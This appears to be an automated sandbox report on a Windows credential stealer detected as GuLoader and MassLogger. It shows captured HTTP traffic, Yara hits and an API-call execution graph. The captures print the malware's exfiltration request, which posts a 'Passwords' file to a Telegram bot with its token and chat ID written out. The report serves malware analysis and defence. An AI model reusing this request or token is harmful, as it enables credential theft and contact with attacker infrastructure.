                                                                                                              2025-01-10 19:10:55 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43536,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536255,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.850000149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:10:58 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd32ffdcc81d2f
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:10:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 66 64 63 63 38 31 64 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd32ffdcc81d2fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:10:58 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:10:58 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 543
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:10:58 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43537,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536258,"document":{"file_n


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.850006149.154.167.2204434932C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 19:11:00 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                              Content-Type: multipart/form-data; boundary================8dd331a3d88592d
                                                                                                              Host: api.telegram.org
                                                                                                              Content-Length: 1090
                                                                                                              2025-01-10 19:11:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 61 33 64 38 38 35 39 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: --===============8dd331a3d88592dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                              2025-01-10 19:11:00 UTC388INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0
                                                                                                              Date: Fri, 10 Jan 2025 19:11:00 GMT
                                                                                                              Content-Type: application/json
                                                                                                              Content-Length: 546
                                                                                                              Connection: close
                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                              2025-01-10 19:11:00 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 36 32 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                              Data Ascii: {"ok":true,"result":{"message_id":43538,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736536260,"document":{"file_n


                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:14:08:58
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\ppISxhDcpF.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:408'037 bytes
                                                                                                              MD5 hash:E64FAF30918D71691DFDE574DD5A6FCB
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1991339210.00000000035CA000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:5
                                                                                                              Start time:14:09:50
                                                                                                              Start date:10/01/2025
                                                                                                              Path:C:\Users\user\Desktop\ppISxhDcpF.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\ppISxhDcpF.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:408'037 bytes
                                                                                                              MD5 hash:E64FAF30918D71691DFDE574DD5A6FCB
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2734788636.000000003582B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2709490272.000000000225A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:false

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:21.4%
                                                                                                                Dynamic/Decrypted Code Coverage:14%
                                                                                                                Signature Coverage:25.2%
                                                                                                                Total number of Nodes:1505
                                                                                                                Total number of Limit Nodes:45
                                                                                                                execution_graph 4759 10001000 4762 1000101b 4759->4762 4769 10001516 4762->4769 4764 10001020 4765 10001024 4764->4765 4766 10001027 GlobalAlloc 4764->4766 4767 1000153d 3 API calls 4765->4767 4766->4765 4768 10001019 4767->4768 4771 1000151c 4769->4771 4770 10001522 4770->4764 4771->4770 4772 1000152e GlobalFree 4771->4772 4772->4764 4773 401cc0 4774 402ba2 18 API calls 4773->4774 4775 401cc7 4774->4775 4776 402ba2 18 API calls 4775->4776 4777 401ccf GetDlgItem 4776->4777 4778 402531 4777->4778 4779 4029c0 4780 402ba2 18 API calls 4779->4780 4781 4029c6 4780->4781 4782 4029f9 4781->4782 4783 40281e 4781->4783 4785 4029d4 4781->4785 4782->4783 4784 406077 18 API calls 4782->4784 4784->4783 4785->4783 4787 405f9c wsprintfW 4785->4787 4787->4783 4187 403c41 4188 403d94 4187->4188 4189 403c59 4187->4189 4191 403de5 4188->4191 4192 403da5 GetDlgItem GetDlgItem 4188->4192 4189->4188 4190 403c65 4189->4190 4193 403c70 SetWindowPos 4190->4193 4194 403c83 4190->4194 4196 403e3f 4191->4196 4205 401389 2 API calls 4191->4205 4195 404119 19 API calls 4192->4195 4193->4194 4198 403ca0 4194->4198 4199 403c88 ShowWindow 4194->4199 4200 403dcf SetClassLongW 4195->4200 4197 404165 SendMessageW 4196->4197 4201 403d8f 4196->4201 4227 403e51 4197->4227 4202 403cc2 4198->4202 4203 403ca8 DestroyWindow 4198->4203 4199->4198 4204 40140b 2 API calls 4200->4204 4207 403cc7 SetWindowLongW 4202->4207 4208 403cd8 4202->4208 4206 4040c3 4203->4206 4204->4191 4209 403e17 4205->4209 4206->4201 4216 4040d3 ShowWindow 4206->4216 4207->4201 4213 403d81 4208->4213 4214 403ce4 GetDlgItem 4208->4214 4209->4196 4210 403e1b SendMessageW 4209->4210 4210->4201 4211 40140b 2 API calls 4211->4227 4212 4040a4 DestroyWindow EndDialog 4212->4206 4267 404180 4213->4267 4217 403d14 4214->4217 4218 403cf7 SendMessageW IsWindowEnabled 4214->4218 4216->4201 4220 403d21 4217->4220 4221 403d68 SendMessageW 4217->4221 4222 403d34 4217->4222 4231 403d19 4217->4231 4218->4201 4218->4217 4219 406077 18 API calls 4219->4227 4220->4221 4220->4231 4221->4213 4224 403d51 4222->4224 4225 403d3c 4222->4225 4229 40140b 2 API calls 4224->4229 4228 40140b 2 API calls 4225->4228 4226 403d4f 4226->4213 4227->4201 4227->4211 4227->4212 4227->4219 4230 404119 19 API calls 4227->4230 4248 403fe4 DestroyWindow 4227->4248 4258 404119 4227->4258 4228->4231 4232 403d58 4229->4232 4230->4227 4264 4040f2 4231->4264 4232->4213 4232->4231 4234 403ecc GetDlgItem 4235 403ee1 4234->4235 4236 403ee9 ShowWindow KiUserCallbackDispatcher 4234->4236 4235->4236 4261 40413b EnableWindow 4236->4261 4238 403f13 EnableWindow 4241 403f27 4238->4241 4239 403f2c GetSystemMenu EnableMenuItem SendMessageW 4240 403f5c SendMessageW 4239->4240 4239->4241 4240->4241 4241->4239 4262 40414e SendMessageW 4241->4262 4263 406055 lstrcpynW 4241->4263 4244 403f8a lstrlenW 4245 406077 18 API calls 4244->4245 4246 403fa0 SetWindowTextW 4245->4246 4247 401389 2 API calls 4246->4247 4247->4227 4248->4206 4249 403ffe CreateDialogParamW 4248->4249 4249->4206 4250 404031 4249->4250 4251 404119 19 API calls 4250->4251 4252 40403c GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4251->4252 4253 401389 2 API calls 4252->4253 4254 404082 4253->4254 4254->4201 4255 40408a ShowWindow 4254->4255 4256 404165 SendMessageW 4255->4256 4257 4040a2 4256->4257 4257->4206 4259 406077 18 API calls 4258->4259 4260 404124 SetDlgItemTextW 4259->4260 4260->4234 4261->4238 4262->4241 4263->4244 4265 4040f9 4264->4265 4266 4040ff SendMessageW 4264->4266 4265->4266 4266->4226 4268 404198 GetWindowLongW 4267->4268 4269 404221 4267->4269 4268->4269 4270 4041a9 4268->4270 4269->4201 4271 4041b8 GetSysColor 4270->4271 4272 4041bb 4270->4272 4271->4272 4273 4041c1 SetTextColor 4272->4273 4274 4041cb SetBkMode 4272->4274 4273->4274 4275 4041e3 GetSysColor 4274->4275 4276 4041e9 4274->4276 4275->4276 4277 4041f0 SetBkColor 4276->4277 4278 4041fa 4276->4278 4277->4278 4278->4269 4279 404214 CreateBrushIndirect 4278->4279 4280 40420d DeleteObject 4278->4280 4279->4269 4280->4279 4281 401fc3 4282 401fd5 4281->4282 4292 402087 4281->4292 4304 402bbf 4282->4304 4284 401423 25 API calls 4290 4021e1 4284->4290 4286 402bbf 18 API calls 4287 401fe5 4286->4287 4288 401ffb LoadLibraryExW 4287->4288 4289 401fed GetModuleHandleW 4287->4289 4291 40200c 4288->4291 4288->4292 4289->4288 4289->4291 4310 40649a WideCharToMultiByte 4291->4310 4292->4284 4295 402056 4297 4051b4 25 API calls 4295->4297 4296 40201d 4298 402025 4296->4298 4299 40203c 4296->4299 4300 40202d 4297->4300 4355 401423 4298->4355 4313 10001759 4299->4313 4300->4290 4302 402079 FreeLibrary 4300->4302 4302->4290 4305 402bcb 4304->4305 4306 406077 18 API calls 4305->4306 4307 402bec 4306->4307 4308 401fdc 4307->4308 4309 4062e9 5 API calls 4307->4309 4308->4286 4309->4308 4311 4064c4 GetProcAddress 4310->4311 4312 402017 4310->4312 4311->4312 4312->4295 4312->4296 4314 10001789 4313->4314 4358 10001b18 4314->4358 4316 10001790 4317 100018a6 4316->4317 4318 100017a1 4316->4318 4319 100017a8 4316->4319 4317->4300 4407 10002286 4318->4407 4390 100022d0 4319->4390 4324 1000180c 4330 10001812 4324->4330 4331 1000184e 4324->4331 4325 100017ee 4420 100024a9 4325->4420 4326 100017d7 4341 100017cd 4326->4341 4417 10002b5f 4326->4417 4327 100017be 4329 100017c4 4327->4329 4336 100017cf 4327->4336 4329->4341 4401 100028a4 4329->4401 4332 100015b4 3 API calls 4330->4332 4334 100024a9 10 API calls 4331->4334 4338 10001828 4332->4338 4339 10001840 4334->4339 4335 100017f4 4431 100015b4 4335->4431 4411 10002645 4336->4411 4344 100024a9 10 API calls 4338->4344 4346 10001895 4339->4346 4442 1000246c 4339->4442 4341->4324 4341->4325 4343 100017d5 4343->4341 4344->4339 4346->4317 4348 1000189f GlobalFree 4346->4348 4348->4317 4352 10001881 4352->4346 4446 1000153d wsprintfW 4352->4446 4354 1000187a FreeLibrary 4354->4352 4356 4051b4 25 API calls 4355->4356 4357 401431 4356->4357 4357->4300 4449 1000121b GlobalAlloc 4358->4449 4360 10001b3c 4450 1000121b GlobalAlloc 4360->4450 4362 10001d7a GlobalFree GlobalFree GlobalFree 4363 10001d97 4362->4363 4378 10001de1 4362->4378 4364 100020ee 4363->4364 4373 10001dac 4363->4373 4363->4378 4366 10002110 GetModuleHandleW 4364->4366 4364->4378 4365 10001c1d GlobalAlloc 4385 10001b47 4365->4385 4369 10002121 LoadLibraryW 4366->4369 4370 10002136 4366->4370 4367 10001c68 lstrcpyW 4371 10001c72 lstrcpyW 4367->4371 4368 10001c86 GlobalFree 4368->4385 4369->4370 4369->4378 4457 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4370->4457 4371->4385 4373->4378 4453 1000122c 4373->4453 4374 10002188 4377 10002195 lstrlenW 4374->4377 4374->4378 4375 10002048 4375->4378 4382 10002090 lstrcpyW 4375->4382 4458 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4377->4458 4378->4316 4379 10002148 4379->4374 4389 10002172 GetProcAddress 4379->4389 4382->4378 4383 10001cc4 4383->4385 4451 1000158f GlobalSize GlobalAlloc 4383->4451 4384 10001f37 GlobalFree 4384->4385 4385->4362 4385->4365 4385->4367 4385->4368 4385->4371 4385->4375 4385->4378 4385->4383 4385->4384 4388 1000122c 2 API calls 4385->4388 4456 1000121b GlobalAlloc 4385->4456 4386 100021af 4386->4378 4388->4385 4389->4374 4398 100022e8 4390->4398 4392 10002415 GlobalFree 4393 100017ae 4392->4393 4392->4398 4393->4326 4393->4327 4393->4341 4394 100023d3 lstrlenW 4394->4392 4400 100023de 4394->4400 4395 100023ba GlobalAlloc CLSIDFromString 4395->4392 4396 1000238f GlobalAlloc WideCharToMultiByte 4396->4392 4397 1000122c GlobalAlloc lstrcpynW 4397->4398 4398->4392 4398->4394 4398->4395 4398->4396 4398->4397 4460 100012ba 4398->4460 4400->4392 4464 100025d9 4400->4464 4403 100028b6 4401->4403 4402 1000295b SetFilePointer 4404 10002979 4402->4404 4403->4402 4405 10002a75 4404->4405 4406 10002a6a GetLastError 4404->4406 4405->4341 4406->4405 4408 10002296 4407->4408 4409 100017a7 4407->4409 4408->4409 4410 100022a8 GlobalAlloc 4408->4410 4409->4319 4410->4408 4415 10002661 4411->4415 4412 100026b2 GlobalAlloc 4416 100026d4 4412->4416 4413 100026c5 4414 100026ca GlobalSize 4413->4414 4413->4416 4414->4416 4415->4412 4415->4413 4416->4343 4418 10002b6a 4417->4418 4419 10002baa GlobalFree 4418->4419 4467 1000121b GlobalAlloc 4420->4467 4422 10002530 StringFromGUID2 4428 100024b3 4422->4428 4423 10002541 lstrcpynW 4423->4428 4424 1000250b MultiByteToWideChar 4424->4428 4425 10002554 wsprintfW 4425->4428 4426 10002571 GlobalFree 4426->4428 4427 100025ac GlobalFree 4427->4335 4428->4422 4428->4423 4428->4424 4428->4425 4428->4426 4428->4427 4429 10001272 2 API calls 4428->4429 4468 100012e1 4428->4468 4429->4428 4472 1000121b GlobalAlloc 4431->4472 4433 100015ba 4434 100015c7 lstrcpyW 4433->4434 4436 100015e1 4433->4436 4437 100015fb 4434->4437 4436->4437 4438 100015e6 wsprintfW 4436->4438 4439 10001272 4437->4439 4438->4437 4440 100012b5 GlobalFree 4439->4440 4441 1000127b GlobalAlloc lstrcpynW 4439->4441 4440->4339 4441->4440 4443 10001861 4442->4443 4444 1000247a 4442->4444 4443->4352 4443->4354 4444->4443 4445 10002496 GlobalFree 4444->4445 4445->4444 4447 10001272 2 API calls 4446->4447 4448 1000155e 4447->4448 4448->4346 4449->4360 4450->4385 4452 100015ad 4451->4452 4452->4383 4459 1000121b GlobalAlloc 4453->4459 4455 1000123b lstrcpynW 4455->4378 4456->4385 4457->4379 4458->4386 4459->4455 4461 100012c1 4460->4461 4462 1000122c 2 API calls 4461->4462 4463 100012df 4462->4463 4463->4398 4465 100025e7 VirtualAlloc 4464->4465 4466 1000263d 4464->4466 4465->4466 4466->4400 4467->4428 4469 100012ea 4468->4469 4470 1000130c 4468->4470 4469->4470 4471 100012f0 lstrcpyW 4469->4471 4470->4428 4471->4470 4472->4433 4788 4016c4 4789 402bbf 18 API calls 4788->4789 4790 4016ca GetFullPathNameW 4789->4790 4791 4016e4 4790->4791 4797 401706 4790->4797 4793 406398 2 API calls 4791->4793 4791->4797 4792 40171b GetShortPathNameW 4794 402a4c 4792->4794 4795 4016f6 4793->4795 4795->4797 4798 406055 lstrcpynW 4795->4798 4797->4792 4797->4794 4798->4797 4799 4014cb 4800 4051b4 25 API calls 4799->4800 4801 4014d2 4800->4801 4802 40194e 4803 402bbf 18 API calls 4802->4803 4804 401955 lstrlenW 4803->4804 4805 402531 4804->4805 4806 4027ce 4807 4027d6 4806->4807 4808 4027da FindNextFileW 4807->4808 4810 4027ec 4807->4810 4809 402833 4808->4809 4808->4810 4812 406055 lstrcpynW 4809->4812 4812->4810 4670 401754 4671 402bbf 18 API calls 4670->4671 4672 40175b 4671->4672 4673 405c59 2 API calls 4672->4673 4674 401762 4673->4674 4675 405c59 2 API calls 4674->4675 4675->4674 4813 401d56 GetDC GetDeviceCaps 4814 402ba2 18 API calls 4813->4814 4815 401d74 MulDiv ReleaseDC 4814->4815 4816 402ba2 18 API calls 4815->4816 4817 401d93 4816->4817 4818 406077 18 API calls 4817->4818 4819 401dcc CreateFontIndirectW 4818->4819 4820 402531 4819->4820 4821 401a57 4822 402ba2 18 API calls 4821->4822 4823 401a5d 4822->4823 4824 402ba2 18 API calls 4823->4824 4825 401a05 4824->4825 4826 4014d7 4827 402ba2 18 API calls 4826->4827 4828 4014dd Sleep 4827->4828 4830 402a4c 4828->4830 4831 40155b 4832 4029f2 4831->4832 4835 405f9c wsprintfW 4832->4835 4834 4029f7 4835->4834 4836 40385c 4837 403867 4836->4837 4838 40386b 4837->4838 4839 40386e GlobalAlloc 4837->4839 4839->4838 4840 4022df 4841 402bbf 18 API calls 4840->4841 4842 4022ee 4841->4842 4843 402bbf 18 API calls 4842->4843 4844 4022f7 4843->4844 4845 402bbf 18 API calls 4844->4845 4846 402301 GetPrivateProfileStringW 4845->4846 4847 401bdf 4848 402ba2 18 API calls 4847->4848 4849 401be6 4848->4849 4850 402ba2 18 API calls 4849->4850 4851 401bf0 4850->4851 4852 401c00 4851->4852 4854 402bbf 18 API calls 4851->4854 4853 401c10 4852->4853 4855 402bbf 18 API calls 4852->4855 4856 401c1b 4853->4856 4857 401c5f 4853->4857 4854->4852 4855->4853 4858 402ba2 18 API calls 4856->4858 4859 402bbf 18 API calls 4857->4859 4860 401c20 4858->4860 4861 401c64 4859->4861 4863 402ba2 18 API calls 4860->4863 4862 402bbf 18 API calls 4861->4862 4864 401c6d FindWindowExW 4862->4864 4865 401c29 4863->4865 4868 401c8f 4864->4868 4866 401c31 SendMessageTimeoutW 4865->4866 4867 401c4f SendMessageW 4865->4867 4866->4868 4867->4868 4869 401960 4870 402ba2 18 API calls 4869->4870 4871 401967 4870->4871 4872 402ba2 18 API calls 4871->4872 4873 401971 4872->4873 4874 402bbf 18 API calls 4873->4874 4875 40197a 4874->4875 4876 40198e lstrlenW 4875->4876 4879 4019ca 4875->4879 4877 401998 4876->4877 4877->4879 4882 406055 lstrcpynW 4877->4882 4880 4019b3 4880->4879 4881 4019c0 lstrlenW 4880->4881 4881->4879 4882->4880 4883 401662 4884 402bbf 18 API calls 4883->4884 4885 401668 4884->4885 4886 406398 2 API calls 4885->4886 4887 40166e 4886->4887 4888 4019e4 4889 402bbf 18 API calls 4888->4889 4890 4019eb 4889->4890 4891 402bbf 18 API calls 4890->4891 4892 4019f4 4891->4892 4893 4019fb lstrcmpiW 4892->4893 4894 401a0d lstrcmpW 4892->4894 4895 401a01 4893->4895 4894->4895 4473 4025e5 4487 402ba2 4473->4487 4475 4025f4 4476 40263a ReadFile 4475->4476 4477 405cad ReadFile 4475->4477 4479 40267a MultiByteToWideChar 4475->4479 4480 40272f 4475->4480 4482 4026d3 4475->4482 4483 4026a0 SetFilePointer MultiByteToWideChar 4475->4483 4484 402740 4475->4484 4486 40272d 4475->4486 4476->4475 4476->4486 4477->4475 4479->4475 4499 405f9c wsprintfW 4480->4499 4482->4475 4482->4486 4490 405d0b SetFilePointer 4482->4490 4483->4475 4485 402761 SetFilePointer 4484->4485 4484->4486 4485->4486 4488 406077 18 API calls 4487->4488 4489 402bb6 4488->4489 4489->4475 4491 405d27 4490->4491 4498 405d43 4490->4498 4492 405cad ReadFile 4491->4492 4493 405d33 4492->4493 4494 405d74 SetFilePointer 4493->4494 4495 405d4c SetFilePointer 4493->4495 4493->4498 4494->4498 4495->4494 4496 405d57 4495->4496 4497 405cdc WriteFile 4496->4497 4497->4498 4498->4482 4499->4486 4896 401e66 4897 402bbf 18 API calls 4896->4897 4898 401e6c 4897->4898 4899 4051b4 25 API calls 4898->4899 4900 401e76 4899->4900 4901 405735 2 API calls 4900->4901 4902 401e7c 4901->4902 4903 40281e 4902->4903 4904 401edb CloseHandle 4902->4904 4905 401e8c WaitForSingleObject 4902->4905 4904->4903 4907 401e9e 4905->4907 4906 401eb0 GetExitCodeProcess 4908 401ec2 4906->4908 4909 401ecd 4906->4909 4907->4906 4910 406467 2 API calls 4907->4910 4913 405f9c wsprintfW 4908->4913 4909->4904 4912 401ea5 WaitForSingleObject 4910->4912 4912->4907 4913->4909 4509 401767 4510 402bbf 18 API calls 4509->4510 4511 40176e 4510->4511 4512 401796 4511->4512 4513 40178e 4511->4513 4550 406055 lstrcpynW 4512->4550 4549 406055 lstrcpynW 4513->4549 4516 401794 4520 4062e9 5 API calls 4516->4520 4517 4017a1 4518 405a09 3 API calls 4517->4518 4519 4017a7 lstrcatW 4518->4519 4519->4516 4531 4017b3 4520->4531 4521 4017ef 4523 405c05 2 API calls 4521->4523 4522 406398 2 API calls 4522->4531 4523->4531 4525 4017c5 CompareFileTime 4525->4531 4526 401885 4527 4051b4 25 API calls 4526->4527 4530 40188f 4527->4530 4528 4051b4 25 API calls 4538 401871 4528->4538 4529 406055 lstrcpynW 4529->4531 4532 403027 32 API calls 4530->4532 4531->4521 4531->4522 4531->4525 4531->4526 4531->4529 4536 406077 18 API calls 4531->4536 4545 40579a MessageBoxIndirectW 4531->4545 4546 40185c 4531->4546 4548 405c2a GetFileAttributesW CreateFileW 4531->4548 4533 4018a2 4532->4533 4534 4018b6 SetFileTime 4533->4534 4535 4018c8 CloseHandle 4533->4535 4534->4535 4537 4018d9 4535->4537 4535->4538 4536->4531 4539 4018f1 4537->4539 4540 4018de 4537->4540 4542 406077 18 API calls 4539->4542 4541 406077 18 API calls 4540->4541 4543 4018e6 lstrcatW 4541->4543 4544 4018f9 4542->4544 4543->4544 4547 40579a MessageBoxIndirectW 4544->4547 